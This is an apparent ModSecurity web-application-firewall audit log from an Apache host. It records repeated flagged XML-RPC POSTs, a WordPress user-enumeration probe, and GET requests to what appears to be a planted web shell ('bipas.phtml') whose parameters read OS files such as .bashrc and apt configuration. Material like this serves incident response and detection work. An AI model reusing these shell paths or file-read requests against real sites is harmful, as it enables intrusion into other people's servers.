Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --da461749-Z-- --5e0f6609-A-- [17/Jun/2025:05:58:47.226269 +0530] aFC2vlJfblPUQiSn5r2aEQAAAAA 146.190.105.35 50132 127.0.0.1 7081 --5e0f6609-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=07m0pb2f7r6c391stmaohr0umh; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_16fada1d58c4a4ba3ae2b8c9ab3b2f%7C%7C1750292925%7C%7C1750289325%7C%7C861900e4057fa943d733b4bcb9be23ad; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f8ddb5760b98a2b81a615f299edcda74%7C%7C1750292925%7C%7C1750289325%7C%7Cf9de70a9184bc7fe2a86e792bd07f930 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5e0f6609-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=vgsh0cshqlks3dbb1ffjjofkh9; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_6d03860c0438b339b497321e9f1b6c%7C%7C1750292927%7C%7C1750289327%7C%7Cbd65d662f72a000236c445744f4f77f4; expires=Thu, 19 Jun 2025 00:28:47 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=50fbaec3e7af63de356c482ace280eba%7C%7C1750292927%7C%7C1750289327%7C%7Cb0ab46fbc9f64c1a1c8ef44f1c8f43c4; expires=Thu, 19 Jun 2025 00:28:47 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5e0f6609-E-- --5e0f6609-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC2vlJfblPUQiSn5r2aEQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120126197647 1028701 (- - -) Stopwatch2: 1750120126197647 1028701; combined=3113, p1=344, p2=2377, p3=103, p4=39, p5=158, sr=88, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e0f6609-Z-- --77a54166-A-- [17/Jun/2025:05:59:48.379795 +0530] aFC2-9yZ4SMykfn97vzAAAAAAAs 146.190.105.35 58602 127.0.0.1 7081 --77a54166-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=p9t3f09jdsc8mhssc1ach6ojee; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_0458fefd04b22c4596f85d8e30ac3e%7C%7C1750292986%7C%7C1750289386%7C%7Ce503369458dc5569cf372eb367b18c67; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=414a9426625ae993e6bf082b9e039dc5%7C%7C1750292987%7C%7C1750289387%7C%7Ce8c5033160b3b3048f584967cb7290ec User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --77a54166-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=ckahl80rp3ihofj71rdg0p9ebi; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4cb2d517ce764cd5d5592b1288fa40%7C%7C1750292988%7C%7C1750289388%7C%7C3e3d4846e4a4eeb74f815c98136b86fd; expires=Thu, 19 Jun 2025 00:29:48 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=6c0c4f2bc870a98fcc7bc03e204f07c8%7C%7C1750292988%7C%7C1750289388%7C%7C7a4d276e8b5e7e19448e3d2342eeb1e2; expires=Thu, 19 Jun 2025 00:29:48 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --77a54166-E-- --77a54166-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC2-9yZ4SMykfn97vzAAAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120187301323 1078559 (- - -) Stopwatch2: 1750120187301323 1078559; combined=3184, p1=417, p2=2376, p3=96, p4=39, p5=160, sr=100, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --77a54166-Z-- --338a2d5c-A-- [17/Jun/2025:06:00:49.128953 +0530] aFC3OFJfblPUQiSn5r2aWAAAAAA 146.190.105.35 59744 127.0.0.1 7081 --338a2d5c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=uht2sh9n9khjl9gph0fggnml07; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_82d5864571278438ac0b054490db9d%7C%7C1750293047%7C%7C1750289447%7C%7Cad410136fd3b4480884fd26ae2f36403; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=07074e82083218ab73f5b7cceecc20bb%7C%7C1750293047%7C%7C1750289447%7C%7C35d62a4696460cb53bc33dad07c27cc7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --338a2d5c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=hnb40m4lvba1p6h0k1i798i5fi; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_902fe7f773053d092b00e9187cb388%7C%7C1750293048%7C%7C1750289448%7C%7C47893d01589b7a261a92f262469ce97d; expires=Thu, 19 Jun 2025 00:30:48 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c093c9d673308460482f233567da8d89%7C%7C1750293049%7C%7C1750289449%7C%7C760048569b1d36c2c7a63446e7394e98; expires=Thu, 19 Jun 2025 00:30:49 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --338a2d5c-E-- --338a2d5c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC3OFJfblPUQiSn5r2aWAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120248068212 1060827 (- - -) Stopwatch2: 1750120248068212 1060827; combined=3166, p1=450, p2=2314, p3=115, p4=37, p5=156, sr=103, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --338a2d5c-Z-- --3df2ea22-A-- [17/Jun/2025:06:01:43.974059 +0530] aFC3bwJ4p5Cdblnjra6A9wAAAAI 216.73.216.240 39512 127.0.0.1 7081 --3df2ea22-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fskel&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fskel%2F.bashrc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3df2ea22-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4752 Connection: close Content-Type: text/html; charset=UTF-8 --3df2ea22-H-- Message: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /proc/thread-self/root/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /proc/thread-self/root/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC3bwJ4p5Cdblnjra6A9wAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120303969728 4386 (- - -) Stopwatch2: 1750120303969728 4386; combined=2376, p1=365, p2=1884, p3=39, p4=33, p5=55, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3df2ea22-Z-- --b07e893e-A-- [17/Jun/2025:06:01:50.090167 +0530] aFC3ddyZ4SMykfn97vzAWwAAAAs 146.190.105.35 40130 127.0.0.1 7081 --b07e893e-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=s0pfp17jm1rf6pj2v77h3nkeo6; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_6e9fb6eeed4076a46f47b6a1196da2%7C%7C1750293108%7C%7C1750289508%7C%7C1d975ab02851103c9e769ea9251b6ee7; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=74407a804f9f35bcfecf6afd176e9bd1%7C%7C1750293108%7C%7C1750289508%7C%7C577e969603b6d4431c3055310e75823b User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --b07e893e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=h2piksfjb59sqt9ft4sktdu2a2; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_980a377c815e8db155c97b94e73b7f%7C%7C1750293109%7C%7C1750289509%7C%7Cde408708fbb4b2b8cf0201c59ba66302; expires=Thu, 19 Jun 2025 00:31:49 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8f0035c70df158f760461c22d8c0a8a2%7C%7C1750293110%7C%7C1750289510%7C%7C4bde65400128bee5b85d9013212259f8; expires=Thu, 19 Jun 2025 00:31:50 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b07e893e-E-- --b07e893e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC3ddyZ4SMykfn97vzAWwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120309067830 1022424 (- - -) Stopwatch2: 1750120309067830 1022424; combined=3035, p1=368, p2=2270, p3=103, p4=39, p5=158, sr=82, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b07e893e-Z-- --4a0b424e-A-- [17/Jun/2025:06:02:40.522722 +0530] aFC3qH4j6VFpohzeqUMU_QAAAAo 52.3.26.180 40120 127.0.0.1 7081 --4a0b424e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apt/apt.conf.d&viewfile=//etc/apt/apt.conf.d/99needrestart HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.3.26.180 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4a0b424e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3156 Connection: close Content-Type: text/html; charset=UTF-8 --4a0b424e-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/99needrestart"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC3qH4j6VFpohzeqUMU_QAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/99needrestart"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC3qH4j6VFpohzeqUMU_QAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120360518533 4243 (- - -) Stopwatch2: 1750120360518533 4243; combined=2333, p1=348, p2=1819, p3=40, p4=39, p5=86, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a0b424e-Z-- --4a55450c-A-- [17/Jun/2025:06:02:48.178684 +0530] aFC3sH4j6VFpohzeqUMVCAAAAAo 3.144.143.104 41112 127.0.0.1 7081 --4a55450c-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 3.144.143.104 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 --4a55450c-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.2.28 Pragma: no-cache Cache-Control: no-cache, must-revalidate, private, max-age=0 Expires: Sat, 26 Jul 1997 05:00:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 --4a55450c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.csquaretech.com"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aFC3sH4j6VFpohzeqUMVCAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120368111238 67531 (- - -) Stopwatch2: 1750120368111238 67531; combined=2217, p1=407, p2=1694, p3=0, p4=0, p5=115, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a55450c-Z-- --eb086628-A-- [17/Jun/2025:06:02:50.918854 +0530] aFC3sdyZ4SMykfn97vzAigAAAAs 146.190.105.35 40550 127.0.0.1 7081 --eb086628-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 Cookie: PHPSESSID=ro7k42c1momtqn2n4hrggn925c; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_589752a02b0a6dcd1af20be7b8e145%7C%7C1750293169%7C%7C1750289569%7C%7C137edb8421f538e557c2dea2fc7dd63d; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=fde549c29f4c35a66281c62d71bb4b1d%7C%7C1750293169%7C%7C1750289569%7C%7C8bc2d33c499930db400c299e96720b5f User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --eb086628-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=5p6u5pr4pq4quuvih3ig8d81pk; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c14ac3422e23d1bdd11e49c479b552%7C%7C1750293170%7C%7C1750289570%7C%7Cdc40b5adfedecc89397c8017cc2ce71b; expires=Thu, 19 Jun 2025 00:32:50 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=17bd8638c2a1ad678908a4cc95af8a39%7C%7C1750293170%7C%7C1750289570%7C%7C910b00c243ffbf43e8d058a0b777981a; expires=Thu, 19 Jun 2025 00:32:50 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --eb086628-E-- --eb086628-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC3sdyZ4SMykfn97vzAigAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120369900761 1018186 (- - -) Stopwatch2: 1750120369900761 1018186; combined=2974, p1=379, p2=2066, p3=148, p4=54, p5=201, sr=92, sw=126, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eb086628-Z-- --19709e34-A-- [17/Jun/2025:06:03:50.439613 +0530] aFC37Wj9J38fG6WAr4phVAAAAAk 146.190.105.35 57450 127.0.0.1 7081 --19709e34-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=184q2s1ji3ugtiepvci2l2p9qd; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f39ba552a0d48204a88b060c57ad12%7C%7C1750293228%7C%7C1750289628%7C%7C873ced89ef2cf58f8239c22a18931f3b; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e5248839f9b5f2a75231b9d844944bca%7C%7C1750293229%7C%7C1750289629%7C%7C589f1eb03c61c2755e4a6c7203778d57 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --19709e34-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=4ncak4it2baf86c9rhqj8b0tts; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_2f5e7fa282e08087598d9e9e0ed34d%7C%7C1750293230%7C%7C1750289630%7C%7Cdde274ba03d1f30b6d8be93d933d1e5b; expires=Thu, 19 Jun 2025 00:33:50 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=51bf8e14360ff083e83bd6039babc2c2%7C%7C1750293230%7C%7C1750289630%7C%7Cd2b772e6e517f14373f964909cc42d6b; expires=Thu, 19 Jun 2025 00:33:50 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --19709e34-E-- --19709e34-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC37Wj9J38fG6WAr4phVAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120429412195 1027500 (- - -) Stopwatch2: 1750120429412195 1027500; combined=3203, p1=448, p2=2196, p3=105, p4=169, p5=179, sr=102, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --19709e34-Z-- --a695fa46-A-- [17/Jun/2025:06:04:50.191448 +0530] aFC4KdyZ4SMykfn97vzA6gAAAAs 146.190.105.35 59012 127.0.0.1 7081 --a695fa46-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=h956hgarr09d3vq9desu1eo2ds; 